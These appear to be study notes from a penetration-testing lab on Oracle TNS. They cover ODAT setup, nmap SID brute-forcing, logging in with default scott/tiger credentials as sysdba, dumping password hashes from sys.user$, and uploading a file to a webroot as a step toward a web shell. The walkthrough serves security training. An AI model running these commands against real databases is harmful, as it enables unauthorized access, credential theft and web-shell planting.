Oracle TNS
Oracle TNS: Oracle Transparent Network Substrate
A protocol that facilitates comm bet Oracle DB's/apps over networks
TNS supports various protocols bet client apps, such as IPX/SPX and TCP/IP protocol stacks
It has become a solution for large, complex db's healthcare, finance, and retail industries
Its built-in encryption mechanism ensures the sec of data transmitted
Ideal solution for enterprise envs where data sec is paramount
TNS now has support IPv6/SSL/TLS encryption which makes suitable for the following:
Name resolution, Connection management, Load balancing, Security Default Config
Default: The listener listens for incoming connections on port 1521
The TNS listener is config to support TCP/IP, UDP, IPX/SPX, and AppleTalk
Can support multiple network ints and listen on specific IP's
Default: Can be remotely managed in Oracle 8i
/
9i but not in 10g/11g
Oracle db's can be protected by using PlsqlExclusionList: PL/SQL Exclusion List
User-created txt file that needs to be placed in
$ORACLE_HOME/sqldeveloper
dirContains the names of PL/SQL packages/types that should be excluded from exec
Once PL/SQL Exclusion List is created: It can be loaded into the db instance
It serves as a blacklist that can't be accessed through the Oracle App Server
connect_data # attributes of connection, service name, sid, protocol, db instance id
instance_name # name of db instance client
service_name # name of service client wants to connect to
security # security type for connections
connect_timeout # time limit in seconds for client to establish a connection to db
receive_timeout # time limit in seconds for client to receive a response from db
send_timeout # time limit in seconds for client to send request to db
sqlnet.expire_time # time limit in seconds for client to detect connection failed
trace_level # tracing for db connection
trace_directory # dir where trace files stored
trace_file_name # name of trace file
log_file # log info
Before we can enumerate the TNS listener and interact with it, we need to download a few packages and tools for our Pwnbox
instance in case it does not have these already.
# oracle-tools-setup.sh
#!/bin/bash
sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
git submodule init git submodule update
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor pycrypto passlib python-libnmap
sudo pip3 install argcomplete && sudo activate-global-python-argcomplete
./odat.py -h
usage: odat.py [-h] [--version]
_ __ _ ___
/ \| \ / \|_ _|
( o ) o ) o || |
\_/|__/|_n_||_|
-------------------------------------------
_ __ _ ___
/ \ | \ / \ |_ _|
( o ) o ) o | | |
\_/racle |__/atabase |_n_|ttacking |_|ool
-------------------------------------------
ODAT: Oracle DB Attacking Tool:
Open-source pentesting tool written in Python/designed to enum/exploit vulns
Can be used to id, exploit, including SQLi, RCE, and privesc
sudo nmap -p1521 -sV 10.129.204.235 --open
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
In Oracle RDBMS, a SID: System Id is a unique name that id's a particular db instance
It can have multiple instances, each with its own SID
Instance: A set of procs/mem structures that interact to manage the db's data
When a client connects to an Oracle db, it specifies the SID, with its connection str
The client uses this SID to id which db instance it wants to connect to
If not specified: The default value defined in the
tnsnames.ora
file is used
The SIDs are an essential part of the connection process, as it identifies the specific instance of the database the client wants to connect to. If the client specifies an incorrect SID, the connection attempt will fail. Database administrators can use the SID to monitor and manage the individual instances of a database. For example, they can start, stop, or restart an instance, adjust its memory allocation or other configuration parameters, and monitor its performance using tools like Oracle Enterprise Manager.
There are various ways to enumerate, or better said, guess SIDs. Therefore we can use tools like nmap
, hydra
, odat
, and others. Let us use nmap
first.
Nmap - SID Bruteforcing
sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
| oracle-sid-brute:
|_ XE
We can use
odat.py
to perform a variety of scans to for info about Oracle db services/componentsScans can retrieve db names, ver, running procs, user accts, vulns, misconfigs, etc. ODAT
./odat.py all -s 10.129.204.235
In this example, we found valid creds for
scott
and his passwordtiger
Now we can use the tool
sqlplus
to connect to the Oracle db/interact with it SQLplus - Log In
sqlplus scott/[email protected]/XE
SQL*Plus: Release 21.0.0.0.0 - Production on Mon Mar 6 11:19:21 2023
Version 21.4.0.0.0
Copyright (c) 1982, 2021, Oracle. All rights reserved.
SQL>
If you come across the following error:
sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory
, please exec below, taken from here
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
Many SQLplus cmds that we can use to enum the db manually
We can list all available tables in the current db/show us privs of the current user: Oracle RDBMS - Interaction
SQL> select table_name from all_tables;
TABLE_NAME
------------------------------
DUAL
SYSTEM_PRIVILEGE_MAP
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NO
scott
has no admin privsWe can try using this acct to log in as Sys Db Admin (
sysdba
), giving us higher privs Oracle RDBMS - Db Enum
sqlplus scott/[email protected]/XE as sysdba
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS ADM_PARALLEL_EXECUTE_TASK YES YES NO
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS DELETE_CATALOG_ROLE YES YES NO
SYS EXECUTE_CATALOG_ROLE YES YES NO
SQL> select name, password from sys.user$;
# we can retrieve password hashes from sys.user$ and try to crack them offline
Another option is to upload a web shell to target Default Paths:
Linux:
/var/www/html
|| Windows:C:\inetpub\wwwroot
# oracle RDBMS - file upload
echo "oracle file upload test" > testing.txt
./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
We can test if the file upload worked with
curl
We will use a
GET http://<IP>
request, or we can visit via browser
curl -X GET http://10.129.204.235/testing.txt # oracle file UL test
Last updated